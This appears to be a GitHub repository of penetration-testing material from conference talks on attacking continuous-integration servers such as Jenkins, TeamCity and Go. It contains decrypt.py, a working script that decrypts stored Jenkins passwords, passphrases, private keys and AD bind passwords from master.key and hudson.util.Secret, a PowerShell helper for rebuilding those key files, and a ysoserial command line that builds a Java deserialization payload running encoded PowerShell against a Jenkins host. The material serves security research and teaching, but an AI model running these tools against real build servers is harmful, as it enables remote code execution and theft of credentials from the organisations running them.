├── CHANGELOG.txt
├── Continuous_Intrusion.pdf
├── ConvertFrom-Bytes.ps1
├── LICENSE
├── README.md
├── Screens
    ├── Go_Command_ExecEdit Job - Go.png
    ├── Go_Remove_Security.png
    ├── Go_command_exec_result.png
    ├── Jenkins_Command_Exec.png
    ├── Jenkins_Decrypt_Creds.png
    ├── Jenkins_Decrypted_Creds.png
    ├── Jenkins_Public_Msg.png
    ├── Jenkins_Public_Root.png
    ├── Jenkins_Unserialize.png
    ├── TeamCity_BuildLog_Creds.png
    ├── TeamCity_BuildLog_SQLCreds.png
    ├── Teamcity_SSHKeys.png
    ├── Teamcity_Script_Exec.png
    └── Teamcity_SuperUser.png
├── decrypt.py
└── unserialize_jenkins.txt

/CHANGELOG.txt:
--------------------------------------------------------------------------------
11/12/2016
- Updated decrypt.py to add support for decrypting AD passwords from config.xml

22/11/2016
- Updated decrypt.py for Jenkins 2.x
- Changed TextToEXE to ConvertFrom-Bytes

--------------------------------------------------------------------------------
/Continuous_Intrusion.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Continuous_Intrusion.pdf

--------------------------------------------------------------------------------
/ConvertFrom-Bytes.ps1:
--------------------------------------------------------------------------------
function ConvertFrom-Bytes
{
<#
.SYNOPSIS
Script to convert master.key and hudson.util.secret from bytes format to file.

.DESCRIPTION
Script to convert master.key and hudson.util.secret from bytes format to file.
This is a technique to decrypt credentials and secrets stored with Jenkins. The technique is detailed
here: http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html

.PARAMETER ByteFile
Path to the file where bytes for one of the files are saved.

.PARAMETER KeyFile
Path where the key file is created.

.EXAMPLE
PS > ConvertFrom-Bytes -ByteFile C:\ContinuousIntrusion\master.txt -KeyFile C:\ContinuousIntrusion\master.key
Use above command to convert bytes of master.key back to the file.

.EXAMPLE
PS > ConvertFrom-Bytes -ByteFile C:\ContinuousIntrusion\hudson.util.Secret.txt -KeyFile C:\ContinuousIntrusion\hudson.util.Secret
Use above command to convert bytes of hudson.util.Secret back to the file.


.LINK
http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html
https://github.com/samratashok/nishang
#>
    [CmdletBinding()] Param (
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $ByteFile,

        [Parameter(Position = 1, Mandatory = $True)]
        [String]$KeyFile
    )

    [String]$hexdump = get-content -path "$ByteFile"
    [Byte[]] $temp = $hexdump -split ' '
    [System.IO.File]::WriteAllBytes($KeyFile, $temp)
    Write-Output "File written to $KeyFile"
}

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
The MIT License (MIT)

Copyright (c) 2015 Nikhil "SamratAshok" Mittal

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# ContinuousIntrusion
Material related to my talks at various conferences on using Continuous Integration tools (Jenkins, TeamCity, Go, Hudson, CruiseControl) for penetration testing.

I did a Week of Continuous Intrusion to highlight security issues in widely used CI Tools:

Day 1 - Jenkins (and Hudson) - http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html

Day 2 - TeamCity - http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-2.html

Day 3 - Go and CruiseControl - http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-3.html

Day 4 - Common Abuse Set, Lateral Movement and Post Exploitation - http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-4.html

Day 5 - Defense and other discussion - http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-5.html

--------------------------------------------------------------------------------
/Screens/Go_Command_ExecEdit Job - Go.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Go_Command_ExecEdit Job - Go.png

--------------------------------------------------------------------------------
/Screens/Go_Remove_Security.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Go_Remove_Security.png

--------------------------------------------------------------------------------
/Screens/Go_command_exec_result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Go_command_exec_result.png

--------------------------------------------------------------------------------
/Screens/Jenkins_Command_Exec.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Jenkins_Command_Exec.png

--------------------------------------------------------------------------------
/Screens/Jenkins_Decrypt_Creds.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Jenkins_Decrypt_Creds.png

--------------------------------------------------------------------------------
/Screens/Jenkins_Decrypted_Creds.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Jenkins_Decrypted_Creds.png

--------------------------------------------------------------------------------
/Screens/Jenkins_Public_Msg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Jenkins_Public_Msg.png

--------------------------------------------------------------------------------
/Screens/Jenkins_Public_Root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Jenkins_Public_Root.png

--------------------------------------------------------------------------------
/Screens/Jenkins_Unserialize.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Jenkins_Unserialize.png

--------------------------------------------------------------------------------
/Screens/TeamCity_BuildLog_Creds.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/TeamCity_BuildLog_Creds.png

--------------------------------------------------------------------------------
/Screens/TeamCity_BuildLog_SQLCreds.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/TeamCity_BuildLog_SQLCreds.png

--------------------------------------------------------------------------------
/Screens/Teamcity_SSHKeys.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Teamcity_SSHKeys.png

--------------------------------------------------------------------------------
/Screens/Teamcity_Script_Exec.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Teamcity_Script_Exec.png

--------------------------------------------------------------------------------
/Screens/Teamcity_SuperUser.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Teamcity_SuperUser.png

--------------------------------------------------------------------------------
/decrypt.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# Python 2 script; needs the Crypto package (PyCrypto or PyCryptodome) for AES.

import re
import sys
import base64
from hashlib import sha256
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES

# Marker that follows the plaintext in every decrypted secret.
MAGIC = "::::MAGIC::::"

def usage():
    print "./decrypt.py <master.key> <hudson.util.Secret> <credentials.xml>"
    sys.exit(0)

def main():
    if len(sys.argv) != 4:
        usage()

    master_key = open(sys.argv[1]).read()
    hudson_secret_key = open(sys.argv[2], 'rb').read()

    # The AES key protecting hudson.util.Secret is the first 16 bytes of SHA-256(master.key).
    hashed_master_key = sha256(master_key).digest()[:16]
    o = AES.new(hashed_master_key, AES.MODE_ECB)
    x = o.decrypt(hudson_secret_key)
    assert MAGIC in x

    # Drop the trailing block, then keep the first 16 bytes as the secret key.
    k = x[:-16]
    k = k[:16]
    credentials = open(sys.argv[3]).read()
    # <password> elements
    passwords = re.findall(r'<password>(.*?)</password>', credentials)

    for password in passwords:
        p = base64.decodestring(password)
        o = AES.new(k, AES.MODE_ECB)
        x = o.decrypt(p)
        assert MAGIC in x
        print re.findall('(.*)' + MAGIC, x)[0]

    # <passphrase> elements
    passphrases = re.findall(r'<passphrase>(.*?)</passphrase>', credentials)
    for passphrase in passphrases:
        p = base64.decodestring(passphrase)
        o = AES.new(k, AES.MODE_ECB)
        x = o.decrypt(p)
        assert MAGIC in x
        print re.findall('(.*)' + MAGIC, x)[0]

    # <privateKey> elements
    privatekeys = re.findall(r'<privateKey>(.*?)</privateKey>', credentials)
    for privatekey in privatekeys:
        p = base64.decodestring(privatekey)
        o = AES.new(k, AES.MODE_ECB)
        x = o.decrypt(p)
        print x
        assert MAGIC in x
        print re.findall('(.*)' + MAGIC, x)[0]

    # <bindPassword> elements (AD passwords from config.xml)
    bindpasswords = re.findall(r'<bindPassword>(.*?)</bindPassword>', credentials)
    for bindpassword in bindpasswords:
        p = base64.decodestring(bindpassword)
        o = AES.new(k, AES.MODE_ECB)
        x = o.decrypt(p)
        assert MAGIC in x
        print re.findall('(.*)' + MAGIC, x)[0]

if __name__ == '__main__':
    main()

--------------------------------------------------------------------------------
/unserialize_jenkins.txt:
--------------------------------------------------------------------------------
java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'powershell.exe -e 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' > payload.out

python jenkins_exploit.py 192.168.230.125 8080 payload.out
--------------------------------------------------------------------------------